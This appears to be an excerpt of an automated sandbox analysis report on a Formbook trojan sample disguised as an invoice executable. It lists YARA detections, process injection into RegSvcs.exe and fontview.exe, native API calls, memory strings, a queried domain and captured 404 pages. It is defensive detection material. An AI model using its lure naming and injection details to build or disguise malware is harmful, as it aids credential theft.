a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 44 3d 64 6f 63 75 6d 65 6e 74 2c 61 3d 4c 2e 70 61 74 68 6e 61 6d 65 2c 62 3d 22 22 2c 63 3d 22 2f 22 2c 64 3d 22 6c 65 6e 67 74 68 22 3b 0d 0a 61 3d 61 2e 73 70 6c 69 74 28 63 29 3b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 5b 64 5d 2d 32 3b 69 2b 2b 29 7b 62 2b 3d 63 2b 61 5b 69 5d 3b 7d 0d 0a 62 2b 3d 63 3b 0d 0a 44 2e 77 72 69 74 65 28 22 42 61 63 6b 20 74 6f 20 3c 61 20 68 72 65 66 3d 5c 22 22 2b 62 2b 22 5c 22 3e 22 2b 4c 2e 68 6f 73 74 2b 62 2b 22 3c 2f 61 3e 20 2c 20 77 61 69 74 69 6e 67 2e 2e 2e 2e 2e 22 29 3b 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 2e 68 72 65 66 3d 62 3b 7d 2c 22 32 30 30 22 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Server: Microsoft-IIS/8.5; Date: Fri, 10 Nov 2023 08:29:23 GMT; Connection: close; Content-Length: 596
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Server: Microsoft-IIS/8.5; Date: Fri, 10 Nov 2023 08:29:57 GMT; Connection: close; Content-Length: 596
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Server: Microsoft-IIS/8.5; Date: Fri, 10 Nov 2023 08:30:01 GMT; Connection: close; Content-Length: 596
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Server: Microsoft-IIS/8.5; Date: Fri, 10 Nov 2023 08:30:04 GMT; Connection: close; Content-Length: 596
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Server: Microsoft-IIS/8.5; Date: Fri, 10 Nov 2023 08:30:07 GMT; Connection: close; Content-Length: 596
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: close; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 708; date: Fri, 10 Nov 2023 08:30:46 GMT; vary: User-Agent; access-control-allow-origin: *; access-control-allow-methods: GET,POST,OPTIONS,DELETE
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: close; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 708; date: Fri, 10 Nov 2023 08:30:49 GMT; vary: User-Agent; access-control-allow-origin: *; access-control-allow-methods: GET,POST,OPTIONS,DELETE
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: close; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 708; date: Fri, 10 Nov 2023 08:30:52 GMT; vary: User-Agent; access-control-allow-origin: *; access-control-allow-methods: GET,POST,OPTIONS,DELETE
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: close; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 708; date: Fri, 10 Nov 2023 08:30:56 GMT; vary: User-Agent; access-control-allow-origin: *; access-control-allow-methods: GET,POST,OPTIONS,DELETE
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-
            Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
            Source: fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)
            Source: unknown, DNS traffic detected: queries for: www.aifuturesummit.com

            E-Banking Fraud

            Source: Yara match, File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000C.00000002.3735548215.0000000004680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000C.00000002.3735623760.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.1351383564.0000000001340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000E.00000002.3737944932.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.1352780699.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.3735552179.00000000042E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0000000C.00000002.3735548215.0000000004680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0000000C.00000002.3735623760.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000004.00000002.1351383564.0000000001340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0000000E.00000002.3737944932.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000004.00000002.1352780699.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0000000B.00000002.3735552179.00000000042E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: initial sample, Static PE information: Filename: Invoice_&_SOA_ready_for_dispatch.exe
            Source: Invoice_&_SOA_ready_for_dispatch.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0040A173 NtSetContextThread,4_2_0040A173
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0040A9C3 NtMapViewOfSection,4_2_0040A9C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0040B293 NtDelayExecution,4_2_0040B293
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0040ABF3 NtCreateFile,4_2_0040ABF3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0040A383 NtResumeThread,4_2_0040A383
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00409D53 NtSuspendThread,4_2_00409D53
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004285D3 NtClose,4_2_004285D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0040AE23 NtReadFile,4_2_0040AE23
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0040B6B3 NtAllocateVirtualMemory,4_2_0040B6B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00409F63 NtGetContextThread,4_2_00409F63
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0040A7A3 NtCreateSection,4_2_0040A7A3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2B60 NtClose,LdrInitializeThunk,4_2_014A2B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_014A2DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_014A2C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A35C0 NtCreateMutant,LdrInitializeThunk,4_2_014A35C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A4340 NtSetContextThread,4_2_014A4340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A4650 NtSuspendThread,4_2_014A4650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2BE0 NtQueryValueKey,4_2_014A2BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2BF0 NtAllocateVirtualMemory,4_2_014A2BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2B80 NtQueryInformationFile,4_2_014A2B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2BA0 NtEnumerateValueKey,4_2_014A2BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2AD0 NtReadFile,4_2_014A2AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2AF0 NtWriteFile,4_2_014A2AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2AB0 NtWaitForSingleObject,4_2_014A2AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2D00 NtSetInformationFile,4_2_014A2D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2D10 NtMapViewOfSection,4_2_014A2D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2D30 NtUnmapViewOfSection,4_2_014A2D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2DD0 NtDelayExecution,4_2_014A2DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2DB0 NtEnumerateKey,4_2_014A2DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2C60 NtCreateKey,4_2_014A2C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2C00 NtQueryInformationProcess,4_2_014A2C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2CC0 NtQueryVirtualMemory,4_2_014A2CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2CF0 NtOpenProcess,4_2_014A2CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2CA0 NtQueryInformationToken,4_2_014A2CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2F60 NtCreateProcessEx,4_2_014A2F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2F30 NtCreateSection,4_2_014A2F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2FE0 NtCreateFile,4_2_014A2FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2F90 NtProtectVirtualMemory,4_2_014A2F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2FA0 NtQuerySection,4_2_014A2FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2FB0 NtResumeThread,4_2_014A2FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2E30 NtWriteVirtualMemory,4_2_014A2E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2EE0 NtQueueApcThread,4_2_014A2EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2E80 NtReadVirtualMemory,4_2_014A2E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A2EA0 NtAdjustPrivilegesToken,4_2_014A2EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A3010 NtOpenDirectoryObject,4_2_014A3010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A3090 NtSetValueKey,4_2_014A3090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A39B0 NtGetContextThread,4_2_014A39B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A3D70 NtOpenThread,4_2_014A3D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A3D10 NtOpenProcessToken,4_2_014A3D10
            Source: C:\Windows\SysWOW64\fontview.exe Code function: 12_2_04AB4650 NtSuspendThread,LdrInitializeThunk,12_2_04AB4650
            Source: C:\Windows\SysWOW64\fontview.exe Code function: 12_2_04AB4340 NtSetContextThread,LdrInitializeThunk,12_2_04AB4340
            Source: C:\Windows\SysWOW64\fontview.exe Code function: 12_2_04AB2CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_04AB2CA0
            Source: C:\Windows\SysWOW64\fontview.exe Code function: 12_2_04AB2C60 NtCreateKey,LdrInitializeThunk,12_2_04AB2C60
            Source: C:\Windows\SysWOW64\fontview.exe Code function: 12_2_04AB2C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_04AB2C70
            Source: C:\Windows\SysWOW64\fontview.exe Code function: 12_2_04AB2DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_04AB2DF0
            Source: C:\Windows\SysWOW64\fontview.exe Code function: 12_2_04AB2DD0 NtDelayExecution,LdrInitializeThunk,12_2_04AB2DD0
            Source: C:\Windows\SysWOW64\fontview.exe Code function: 12_2_04AB2D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_04AB2D30
            Source: C:\Windows\SysWOW64\fontview.exe Code function: 12_2_04AB2D10 NtMapViewOfSection,LdrInitializeThunk,12_2_04AB2D10
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_04AB2E80
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2EE0 NtQueueApcThread,LdrInitializeThunk,12_2_04AB2EE0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2FB0 NtResumeThread,LdrInitializeThunk,12_2_04AB2FB0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2FE0 NtCreateFile,LdrInitializeThunk,12_2_04AB2FE0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2F30 NtCreateSection,LdrInitializeThunk,12_2_04AB2F30
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2AF0 NtWriteFile,LdrInitializeThunk,12_2_04AB2AF0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2AD0 NtReadFile,LdrInitializeThunk,12_2_04AB2AD0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_04AB2BA0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2BE0 NtQueryValueKey,LdrInitializeThunk,12_2_04AB2BE0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_04AB2BF0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2B60 NtClose,LdrInitializeThunk,12_2_04AB2B60
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB35C0 NtCreateMutant,LdrInitializeThunk,12_2_04AB35C0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB39B0 NtGetContextThread,LdrInitializeThunk,12_2_04AB39B0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2CF0 NtOpenProcess,12_2_04AB2CF0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2CC0 NtQueryVirtualMemory,12_2_04AB2CC0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2C00 NtQueryInformationProcess,12_2_04AB2C00
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2DB0 NtEnumerateKey,12_2_04AB2DB0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2D00 NtSetInformationFile,12_2_04AB2D00
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2EA0 NtAdjustPrivilegesToken,12_2_04AB2EA0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2E30 NtWriteVirtualMemory,12_2_04AB2E30
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2FA0 NtQuerySection,12_2_04AB2FA0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2F90 NtProtectVirtualMemory,12_2_04AB2F90
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2F60 NtCreateProcessEx,12_2_04AB2F60
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2AB0 NtWaitForSingleObject,12_2_04AB2AB0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2B80 NtQueryInformationFile,12_2_04AB2B80
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB3090 NtSetValueKey,12_2_04AB3090
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB3010 NtOpenDirectoryObject,12_2_04AB3010
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB3D10 NtOpenProcessToken,12_2_04AB3D10
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB3D70 NtOpenThread,12_2_04AB3D70
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A54FD0 NtCreateFile,12_2_02A54FD0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A55240 NtClose,12_2_02A55240
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A55370 NtAllocateVirtualMemory,12_2_02A55370
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A551C0 NtDeleteFile,12_2_02A551C0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A55100 NtReadFile,12_2_02A55100
            Source: Invoice_&_SOA_ready_for_dispatch.exe, 00000000.00000002.1262073362.000000000122E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Invoice_&_SOA_ready_for_dispatch.exe
            Source: Invoice_&_SOA_ready_for_dispatch.exe, 00000000.00000000.1231117286.0000000000C4E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegpHbg.exeF vs Invoice_&_SOA_ready_for_dispatch.exe
